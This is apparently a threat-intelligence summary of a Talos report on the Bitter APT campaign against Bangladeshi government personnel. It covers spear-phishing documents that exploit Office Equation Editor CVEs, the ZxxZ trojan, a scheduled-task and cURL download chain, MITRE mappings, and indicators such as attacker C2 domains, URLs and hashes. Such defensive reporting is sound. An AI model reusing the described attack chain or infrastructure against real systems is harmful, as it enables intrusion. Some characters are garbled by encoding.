Cisco Talos detects an ongoing Bitter APT operation targeting Bangladesh since August 2021, featuring a new Trojan called ZxxZ with remote file execution capabilities. The campaign employs spear-phishing with Office exploits and a C2 infrastructure that uses AWS Global Accelerator to conceal activity and download additional tools. #BitterAPT #ZxxZ #Bangladesh #RapidActionBattalion
Keypoints
- The Bitter APT group is targeting Bangladeshi government personnel, marking a regional shift in their victims.
- A new trojan named ZxxZ is used, with remote file execution capabilities and downloader functionality.
- The campaign leverages spear-phishing emails with malicious RTF or Excel attachments to deliver the malware.
- The malicious documents exploit known Office vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802) via the Equation Editor to run shellcode.
- The attackers host the trojan on compromised hosting infrastructure and use C2 servers such as helpdesk.autodefragapp.com, resolving to 99.83.154.118 (an AWS Global Accelerator IP).
<liThe infection chain includes scheduled tasks and the use of cURL to download the trojan/dropper (ZxxZ) in Windows environments.
<liAttribution to Bitter (T-APT-17) is based on C2 reuse and payload string similarities, with moderate confidence.
MITRE Techniques
- [T1566.001] Spearphishing Attachment β The campaign targets Bangladeshi government personnel with spear-phishing emails. βThe emails contain either a malicious RTF document or a Microsoft Excel spreadsheetβ and the lure patterns align with prior campaigns.
- [T1203] Exploitation for Client Execution β The maldocs exploit Office vulnerabilities described by CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802, with the Equation Editor launching to run embedded shellcode.
- [T1105] Ingress Tool Transfer β The trojan is downloaded from the hosting server and runs on the victimβs machine.
- [T1053.005] Scheduled Task β The infection chain uses the Task Scheduler to configure two scheduled tasks that download and execute ZxxZ.
- [T1071.001] Web Protocols β The trojan downloads payloads over HTTP from the hosting infrastructure.
- [T1071.004] Application Layer Protocol: DNS β The actors use DNS to establish contact with the C2.
- [T1057] Process Discovery β The malware searches for antivirus processes (Windows Defender and Kaspersky) as part of defense evasion.
- [T1082] System Information Discovery β The malware gathers hostname, OS product name, and username for exfiltration/target tailoring.
- [T1027] Obfuscated/Compressed Files β The malware uses encoding/obfuscation to hide strings in WinMain.
Indicators of Compromise
- [Domains] β autodefragapp.com, helpdesk.autodefragapp.com, olmajhnservice.com, tomcruefrshsvc.com, levarisnetqlsvc.net, urocakpmpanel.com
- [IP Addresses] β 99.83.154.118
- [URLs] β http://autodefragapp.com/, http://olmajhnservice.com/updateReqServ10893x.php?x=035347, http://olmajhnservice.com/nxl/nx
- [SSL Certificates Thumbprints] β 0cbf8c7ff9faf01a9b5c3874e9a9d49cbbf5037b, 25092b60d972e574ed593a468564de2394fa008b
- [File Names] β Update.exe, ntfsc.exe, nx
- [Payload Hashes] β fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92, 3fdf291e39e93305ebc9df19ba480ebd60845053b0b606a620bf482d0f09f4d3
- [Documents] β b0b687977eee41ee7c3ed0d9d179e8c00181f0c0db64eebc0005a5c6325e8a82, f7ed5eec6d1869498f2fca8f989125326b2d8cee8dcacf3bc9315ae7566963db
Read more: https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html